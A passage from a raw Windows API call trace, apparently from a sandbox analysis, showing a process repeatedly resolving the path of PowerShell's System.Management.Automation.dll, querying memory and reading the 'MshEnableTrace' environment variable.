lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0051.078] GetLastError () returned 0xcb [0051.088] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19d874, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0051.088] GetLastError () returned 0xcb [0051.089] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19d824, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0051.089] GetLastError () returned 0xcb [0051.089] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19d824, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0051.089] GetLastError () returned 0xcb [0051.089] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19d874, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0051.089] GetLastError () returned 0xcb [0051.089] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19d824, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0051.089] GetLastError () returned 0xcb [0051.089] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19d824, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0051.089] GetLastError () returned 0xcb [0051.089] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19d874, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0051.089] GetLastError () returned 0xcb [0051.089] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19d824, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0051.089] GetLastError () returned 0xcb [0051.089] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19d824, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0051.089] GetLastError () returned 0xcb [0051.089] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19d874, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0051.089] GetLastError () returned 0xcb [0051.089] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19d824, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0051.089] GetLastError () returned 0xcb [0051.089] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19d824, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0051.089] GetLastError () returned 0xcb [0051.090] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19d874, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0051.090] GetLastError () returned 0xcb [0051.090] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19d824, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0051.090] GetLastError () returned 0xcb [0051.090] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19d824, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0051.090] GetLastError () returned 0xcb [0051.090] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19d874, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0051.090] GetLastError () returned 0xcb [0051.090] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19d824, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0051.090] GetLastError () returned 0xcb [0051.090] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19d824, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0051.090] GetLastError () returned 0xcb [0051.090] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19d874, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0051.090] GetLastError () returned 0xcb [0051.090] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19d824, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0051.090] GetLastError () returned 0xcb [0051.090] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19d824, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0051.090] GetLastError () returned 0xcb [0051.090] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19d870, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0051.090] GetLastError () returned 0xcb [0051.090] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19d820, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0051.090] GetLastError () returned 0xcb [0051.090] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19d820, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0051.090] GetLastError () returned 0xcb [0051.090] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19d870, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0051.090] GetLastError () returned 0xcb [0051.091] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19d820, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0051.091] GetLastError () returned 0xcb [0051.091] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19d820, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0051.091] GetLastError () returned 0xcb [0051.091] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19d870, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0051.091] GetLastError () returned 0xcb [0051.091] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19d820, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0051.091] GetLastError () returned 0xcb [0051.091] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19d820, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0051.091] GetLastError () returned 0xcb [0051.091] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19d870, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0051.091] GetLastError () returned 0xcb [0051.091] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19d820, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0051.091] GetLastError () returned 0xcb [0051.091] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19d820, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0051.091] GetLastError () returned 0xcb [0051.091] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19d870, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0051.091] GetLastError () returned 0xcb [0051.091] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19d820, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0051.091] GetLastError () returned 0xcb [0051.091] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19d820, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0051.091] GetLastError () returned 0xcb [0051.091] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19d870, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0051.091] GetLastError () returned 0xcb [0051.091] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19d820, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0051.091] GetLastError () returned 0xcb [0051.091] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19d820, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0051.092] GetLastError () returned 0xcb [0051.092] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19d870, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0051.092] GetLastError () returned 0xcb [0051.092] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19d820, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0051.092] GetLastError () returned 0xcb [0051.092] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19d820, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0051.092] GetLastError () returned 0xcb [0051.092] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19d870, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0051.092] GetLastError () returned 0xcb [0051.092] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19d820, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0051.092] GetLastError () returned 0xcb [0051.092] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19d820, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0051.092] GetLastError () returned 0xcb [0051.092] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19d870, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0051.092] GetLastError () returned 0xcb [0051.092] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19d820, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0051.092] GetLastError () returned 0xcb [0051.092] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19d820, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0051.092] GetLastError () returned 0xcb [0051.093] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19d854, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0051.093] GetLastError () returned 0xcb [0051.093] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19d804, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0051.093] GetLastError () returned 0xcb [0051.093] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19d804, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0051.093] GetLastError () returned 0xcb [0051.093] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19d804, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0051.093] GetLastError () returned 0xcb [0051.109] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19d854, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0051.109] GetLastError () returned 0xcb [0051.109] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19d804, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0051.109] GetLastError () returned 0xcb [0051.109] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19d804, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0051.109] GetLastError () returned 0xcb [0051.109] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19d854, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0051.109] GetLastError () returned 0xcb [0051.109] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19d804, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0051.109] GetLastError () returned 0xcb [0051.109] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x19d804, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0051.109] GetLastError () returned 0xcb [0051.109] VirtualQuery (in: lpAddress=0x19cd80, lpBuffer=0x19dd80, dwLength=0x1c | out: lpBuffer=0x19dd80*(BaseAddress=0x19c000, AllocationBase=0x160000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0051.110] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x247300, nSize=0x80 | out: lpBuffer="") returned 0x0 [0051.110] GetLastError () returned 0xcb [0051.116] VirtualQuery (in: lpAddress=0x19cd80, lpBuffer=0x19dd80, dwLength=0x1c | out: lpBuffer=0x19dd80*(BaseAddress=0x19c000, AllocationBase=0x160000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0051.134] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x247300, nSize=0x80 | out: lpBuffer="") returned 0x0 [0051.134] GetLastError () returned 0xcb [0051.135] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x247300, nSize=0x80 | out: lpBuffer="") returned 0x0 [0051.135] GetLastError () returned 0xcb [0051.138] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x247300, nSize=0x80 | out: lpBuffer="") returned 0x0 [0051.138] GetLastError () returned 0xcb [0051.142] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x247300, nSize=0x80 | out: lpBuffer="") returned 0x0 [0051.142] GetLastError () returned 0xcb [0051.149] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x247300, nSize=0x80 | out: lpBuffer="") returned 0x0 [0051.149] GetLastError () returned 0xcb [0051.156] VirtualQuery (in: lpAddress=0x19cd80, lpBuffer=0x19dd80, dwLength=0x1c | out: lpBuffer=0x19dd80*(BaseAddress=0x19c000, AllocationBase=0x160000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0051.157] VirtualQuery (in: lpAddress=0x19cd80, lpBuffer=0x19dd80, dwLength=0x1c | out: lpBuffer=0x19dd80*(BaseAddress=0x19c000, 